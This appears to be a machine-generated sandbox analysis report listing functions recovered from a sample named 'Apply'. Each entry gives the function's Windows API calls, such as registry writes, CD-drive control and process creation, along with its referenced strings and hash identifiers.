GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1650
HeapFree.KERNEL32(00000000), ref: 008B1657
GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1660
HeapFree.KERNEL32(00000000), ref: 008B1667
GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1670
HeapFree.KERNEL32(00000000), ref: 008B1677
GetProcessHeap.KERNEL32(00000000,?), ref: 008B1683
HeapFree.KERNEL32(00000000), ref: 008B168A

Part of subcall function 008B1875: GetProcessHeap.KERNEL32(00000008,008B1293,?,00000000,?,008B1293,?), ref: 008B1883
Part of subcall function 008B1875: HeapAlloc.KERNEL32(00000000,?,00000000,?,008B1293,?), ref: 008B188A
Part of subcall function 008B1875: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,008B1293,?), ref: 008B1899

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 695b8b9892f3b171c3b12c70a74766e8baa4149d0966ae7aa77ff4f745b03ad7
Instruction ID: 0961fb0115ee905c07291901c0f4e7a01b37d6245bac2fb679daeab668a31e99
Opcode Fuzzy Hash: 695b8b9892f3b171c3b12c70a74766e8baa4149d0966ae7aa77ff4f745b03ad7
Instruction Fuzzy Hash: 637149B6900209ABDF109FA4DC88BEEBBB8FF15310F484115F915EB291D7319A05CBA0

Function 008DCB3E Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DCC44
RegCreateKeyExW.ADVAPI32(?,?,00000000,008EDC1C,00000000,?,00000000,?,?), ref: 008DCCCB
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 008DCD2B
_wcslen.LIBCMT ref: 008DCD7B
_wcslen.LIBCMT ref: 008DCDF6
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 008DCE39
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 008DCF48
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 008DCFD4
RegCloseKey.ADVAPI32(?), ref: 008DD008
RegCloseKey.ADVAPI32(00000000), ref: 008DD015
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 008DD0E7

Strings

REG_DWORD, xrefs: 008DCF8B
REG_BINARY, xrefs: 008DD09A
REG_EXPAND_SZ, xrefs: 008DCD54
REG_SZ, xrefs: 008DCDCB
REG_MULTI_SZ, xrefs: 008DCE7C
REG_QWORD, xrefs: 008DD04A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 37ac72597f636b1867a30160ff9bc7a28df170d3f23048601d2216187887b17f
Instruction ID: 11a7c295c2103beb6a4d36a61a55cf6798fa288e0b0636e4a4ff8a611513b991
Opcode Fuzzy Hash: 37ac72597f636b1867a30160ff9bc7a28df170d3f23048601d2216187887b17f
Instruction Fuzzy Hash: DE1227352046019FCB15DF18C881A2AB7E6FF88714F14859DF85ADB3A2DB31ED46CB82

Function 008E10D8 Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 008E1180
_wcslen.LIBCMT ref: 008E11BB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008E120E
_wcslen.LIBCMT ref: 008E1244
_wcslen.LIBCMT ref: 008E12C0
_wcslen.LIBCMT ref: 008E133B

Part of subcall function 0086FD18: _wcslen.LIBCMT ref: 0086FD23

Part of subcall function 008B32CA: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008B32DC

Strings

ISCHECKED, xrefs: 008E149B
EXISTS, xrefs: 008E1336, 008E1351
GETITEMCOUNT, xrefs: 008E13D8
UNCHECK, xrefs: 008E14F8
GETTEXT, xrefs: 008E1451
GETSELECTED, xrefs: 008E1408
SELECT, xrefs: 008E14CB
CHECK, xrefs: 008E123F, 008E125A
GETTOTALCOUNT, xrefs: 008E11AC, 008E11D1
COLLAPSE, xrefs: 008E12BB, 008E12D6
EXPAND, xrefs: 008E13B2

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 34e63b84f8c0b09e354e54ed180059645ef2eeb590d003be588befafb02386b3
Instruction ID: 430b495fd18d1696e42d0c925eaacd1caeb58b553875d2699a9d14aed6677344
Opcode Fuzzy Hash: 34e63b84f8c0b09e354e54ed180059645ef2eeb590d003be588befafb02386b3
Instruction Fuzzy Hash: 1EE19D352087818FCB14DF2AC44586AB7E2FF95314B54895CF896DB7A2DB30ED49CB82

Function 008DD11F Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 240COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,008DBE35,?,?), ref: 008DD13C
_wcslen.LIBCMT ref: 008DD178
_wcslen.LIBCMT ref: 008DD1E6
_wcslen.LIBCMT ref: 008DD21C
_wcslen.LIBCMT ref: 008DD277
_wcslen.LIBCMT ref: 008DD2AD
_wcslen.LIBCMT ref: 008DD2FD

Strings

HKEY_LOCAL_MACHINE, xrefs: 008DD1E0, 008DD1E5
HKEY_CURRENT_USER, xrefs: 008DD33B
HKEY_USERS, xrefs: 008DD35D
HKLM, xrefs: 008DD216, 008DD21B
HKEY_CLASSES_ROOT, xrefs: 008DD271, 008DD276
HKCU, xrefs: 008DD34C
HKCR, xrefs: 008DD2A7, 008DD2AC
HKEY_CURRENT_CONFIG, xrefs: 008DD2F7, 008DD2FC
HKCC, xrefs: 008DD32A
HKU, xrefs: 008DD36E

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: a82a39ae359b545556172d316fadc6f240882d28a38b6b9796dba2d0b9c2931e
Instruction ID: 01472b27dc2281b809414783a4aadf6ea800f2800f196985cb74f5c0189f0f1d
Opcode Fuzzy Hash: a82a39ae359b545556172d316fadc6f240882d28a38b6b9796dba2d0b9c2931e
Instruction Fuzzy Hash: BB71B032A0072A8BCB20DE6C8D419FA3395FB60754B21472AEC65DB384EA31EE45C691

Function 008E8A28 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008E8A46
_wcslen.LIBCMT ref: 008E8A5A
_wcslen.LIBCMT ref: 008E8A7D
_wcslen.LIBCMT ref: 008E8AA0
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008E8ADE
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,008E63B2), ref: 008E8B3A
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008E8B73
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 008E8BB6
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008E8BED
FreeLibrary.KERNEL32(?), ref: 008E8BF9
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008E8C09
DestroyIcon.USER32(?,?,?,?,?,008E63B2), ref: 008E8C18
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 008E8C35
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 008E8C41

Strings

.dll, xrefs: 008E8A97
.icl, xrefs: 008E8A54
.exe, xrefs: 008E8A74

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: c9c8e3f5580756040b633fe3e6445ffb27749cec3b9de229f0c4a39ac8448004
Instruction ID: c9fc8cff5707e99b9ca047c20aaa26b9dfbb54891dd74d490e2cebf921718e4e
Opcode Fuzzy Hash: c9c8e3f5580756040b633fe3e6445ffb27749cec3b9de229f0c4a39ac8448004
Instruction Fuzzy Hash: 0B61E071500659FBEB14DF65CC81BBE77A8FB09724F108106F919DA0D1DB74AA84CBA0

Function 008C45E8 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 008C4667
_wcslen.LIBCMT ref: 008C4672
_wcslen.LIBCMT ref: 008C46C9
_wcslen.LIBCMT ref: 008C4707
GetDriveTypeW.KERNEL32(?), ref: 008C4745
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008C478D
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008C47C8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008C47F6

Strings

type cdaudio alias cd wait, xrefs: 008C4770
close, xrefs: 008C466D, 008C4687
wait, xrefs: 008C47B3
closed, xrefs: 008C4677, 008C469C, 008C46B5, 008C46ED, 008C4706
open , xrefs: 008C4754
set cd door , xrefs: 008C4797
open, xrefs: 008C46C3, 008C46C8
close cd wait, xrefs: 008C47E1

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: e24ce8514d1c66761b7d22954f07ab479315969da53a30b4656e774f976aad5a
Instruction ID: 6c72b53e7453962b66c2eb2fcff699b96c4484525a6d04c44b59956bb07bab9e
Opcode Fuzzy Hash: e24ce8514d1c66761b7d22954f07ab479315969da53a30b4656e774f976aad5a
Instruction Fuzzy Hash: CA719C326083169FC710EF28C8A196AB7F4FF94758B50892DF896D7251E730DD89CB92

Function 008B6114 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 008B6127
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 008B6139
SetWindowTextW.USER32(?,?), ref: 008B6150
GetDlgItem.USER32(?,000003EA), ref: 008B6165
SetWindowTextW.USER32(00000000,?), ref: 008B616B
GetDlgItem.USER32(?,000003E9), ref: 008B617B
SetWindowTextW.USER32(00000000,?), ref: 008B6181
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 008B61A2
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 008B61BC
GetWindowRect.USER32(?,?), ref: 008B61C5
_wcslen.LIBCMT ref: 008B622C
SetWindowTextW.USER32(?,?), ref: 008B6268
GetDesktopWindow.USER32 ref: 008B626E
GetWindowRect.USER32(00000000), ref: 008B6275
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 008B62CC
GetClientRect.USER32(?,?), ref: 008B62D9
PostMessageW.USER32(?,00000005,00000000,?), ref: 008B62FE
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 008B6328

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 6271535eeebe6adef3d112eb8891512d0850491581119ba7ff0a01b6b68f2e82
Instruction ID: 404757698599039391265f6fef0c2906736d860d21c39bafdbe47f5c65b54c32
Opcode Fuzzy Hash: 6271535eeebe6adef3d112eb8891512d0850491581119ba7ff0a01b6b68f2e82
Instruction Fuzzy Hash: 4B717131900709EFDB20DFA8CE85AAEBBF5FF48704F104528E546E66A0E779E954CB50

Function 008D0595 Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 008D05AE
LoadCursorW.USER32(00000000,00007F8A), ref: 008D05B9
LoadCursorW.USER32(00000000,00007F00), ref: 008D05C4
LoadCursorW.USER32(00000000,00007F03), ref: 008D05CF
LoadCursorW.USER32(00000000,00007F8B), ref: 008D05DA
LoadCursorW.USER32(00000000,00007F01), ref: 008D05E5
LoadCursorW.USER32(00000000,00007F81), ref: 008D05F0
LoadCursorW.USER32(00000000,00007F88), ref: 008D05FB
LoadCursorW.USER32(00000000,00007F80), ref: 008D0606
LoadCursorW.USER32(00000000,00007F86), ref: 008D0611
LoadCursorW.USER32(00000000,00007F83), ref: 008D061C
LoadCursorW.USER32(00000000,00007F85), ref: 008D0627
LoadCursorW.USER32(00000000,00007F82), ref: 008D0632
LoadCursorW.USER32(00000000,00007F84), ref: 008D063D
LoadCursorW.USER32(00000000,00007F04), ref: 008D0648
LoadCursorW.USER32(00000000,00007F02), ref: 008D0653
GetCursorInfo.USER32(?), ref: 008D0663
GetLastError.KERNEL32 ref: 008D06A5

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 961de8921c5a67d74800f6e91b5567a3dfbf69b8ee2aef85bf53a9b895853115
Instruction ID: ff3d0c85fce8ff6eeda4ab9ed6facc43578bd5c6b9a698033573c7bbf015400f
Opcode Fuzzy Hash: 961de8921c5a67d74800f6e91b5567a3dfbf69b8ee2aef85bf53a9b895853115
Instruction Fuzzy Hash: 644183B0D083196ADB10DFBA9C8995EBFE8FF44354B50462AE11CEB281DA78D801CF91

Function 00870416 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00870416

Part of subcall function 0087043D: InitializeCriticalSectionAndSpinCount.KERNEL32(009216FC,00000FA0,AD6ACC9F,?,?,?,?,00892703,000000FF), ref: 0087046C
Part of subcall function 0087043D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00892703,000000FF), ref: 00870477
Part of subcall function 0087043D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00892703,000000FF), ref: 00870488
Part of subcall function 0087043D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0087049E
Part of subcall function 0087043D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 008704AC
Part of subcall function 0087043D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 008704BA
Part of subcall function 0087043D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008704E5
Part of subcall function 0087043D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008704F0

___scrt_fastfail.LIBCMT ref: 00870437

Part of subcall function 008703F3: __onexit.LIBCMT ref: 008703F9

Strings

kernel32.dll, xrefs: 00870483
WakeAllConditionVariable, xrefs: 008704B2
InitializeConditionVariable, xrefs: 00870498
SleepConditionVariableCS, xrefs: 008704A4
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00870472

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: bf124ec40d0e88bb49e4e56ca6a7b3400316663675f4516b347d517818edaee3
Instruction ID: a4c41216998201599ef9376926fe2330e6799ea8738055d2deb6bff6fae8ec87
Opcode Fuzzy Hash: bf124ec40d0e88bb49e4e56ca6a7b3400316663675f4516b347d517818edaee3
Instruction Fuzzy Hash: 7C213B32A44314EFD7112BB8AC45B6A7798FB44F65F048129FA09EA389DF74D8008EA5

Function 008B37D8 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008B386E
_wcslen.LIBCMT ref: 008B38D9

Strings

TEXT, xrefs: 008B3B5D
REGEXPCLASS, xrefs: 008B3936, 008B3947
INSTANCE, xrefs: 008B3B34
CLASSNN, xrefs: 008B38D4, 008B38E5
CLASS, xrefs: 008B3869, 008B3886
NAME, xrefs: 008B3A16, 008B3A27

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: cdff8222f2dae437e534011869cdef4811c0b1d4cb2914caef0e37508d148e5e
Instruction ID: 13dc67f99078e4d07de944f8d1ff02ed4abb675270b654312ca763cd23849cc1
Opcode Fuzzy Hash: cdff8222f2dae437e534011869cdef4811c0b1d4cb2914caef0e37508d148e5e
Instruction Fuzzy Hash: 10E1B431A0452AABCB28DFA8C4916EDFBB4FF14714F548129E856E7350DB30AE89C790

Function 008C4C2F Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,008EDC1C), ref: 008C4C96
_wcslen.LIBCMT ref: 008C4CAA
_wcslen.LIBCMT ref: 008C4D08
_wcslen.LIBCMT ref: 008C4D63
_wcslen.LIBCMT ref: 008C4DAE
_wcslen.LIBCMT ref: 008C4E16

Part of subcall function 0086FD18: _wcslen.LIBCMT ref: 0086FD23

GetDriveTypeW.KERNEL32(?,00917C00,00000061), ref: 008C4EB2

Strings

all, xrefs: 008C4CA0, 008C4CA5
cdrom, xrefs: 008C4CFE, 008C4D03
removable, xrefs: 008C4D59, 008C4D5E
fixed, xrefs: 008C4DA4, 008C4DA9
network, xrefs: 008C4E0C, 008C4E11
ramdisk, xrefs: 008C4E60
unknown, xrefs: 008C4E77

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: f8a551e931d17e7a0ce614970f3c3fe29069717dc6d8671529085369f384c355
Instruction ID: 33b441a58ad60521eab5bf5695a4626bb2f1e1075f2a9e2449959fe61fc16624
Opcode Fuzzy Hash: f8a551e931d17e7a0ce614970f3c3fe29069717dc6d8671529085369f384c355
Instruction Fuzzy Hash: CBB1B1316083029FC710EF28D9A0E6AB7F5FFA4724F50591DF996C7295DB30D889CA92

Function 008DB780 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008DB91F
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008DB937
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008DB95B
_wcslen.LIBCMT ref: 008DB987
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008DB99B
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008DB9BD
_wcslen.LIBCMT ref: 008DBAB9

Part of subcall function 008C0C78: GetStdHandle.KERNEL32(000000F6), ref: 008C0C97

_wcslen.LIBCMT ref: 008DBAD2
_wcslen.LIBCMT ref: 008DBAED
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008DBB3D
GetLastError.KERNEL32(00000000), ref: 008DBB8E
CloseHandle.KERNEL32(?), ref: 008DBBC0
CloseHandle.KERNEL32(00000000), ref: 008DBBD1
CloseHandle.KERNEL32(00000000), ref: 008DBBE3
CloseHandle.KERNEL32(00000000), ref: 008DBBF5
CloseHandle.KERNEL32(?), ref: 008DBC6A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: fb485b159c7b9e3843c94c6fa0197932a8bf5acc35ad22f4b9fb37225542ff83
Instruction ID: 734344e57ed8e3d86b8950065f9b870dc0ac9feff492992740da0564fd075ae5
Opcode Fuzzy Hash: fb485b159c7b9e3843c94c6fa0197932a8bf5acc35ad22f4b9fb37225542ff83
Instruction Fuzzy Hash: 39F16671504340DFCB15EF28C891A6ABBE5FF85354F19865EE8898B3A2DB30EC45CB52

Function 008D4770 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,008EDC1C), ref: 008D4842
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 008D4854
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,008EDC1C), ref: 008D4879
FreeLibrary.KERNEL32(00000000,?,008EDC1C), ref: 008D48C5
StringFromGUID2.OLE32(?,?,00000028,?,008EDC1C), ref: 008D492F
SysFreeString.OLEAUT32(00000009), ref: 008D49E9
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008D4A4F
SysFreeString.OLEAUT32(?), ref: 008D4A79

Strings

GetModuleHandleExW, xrefs: 008D484E
kernel32.dll, xrefs: 008D483D

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

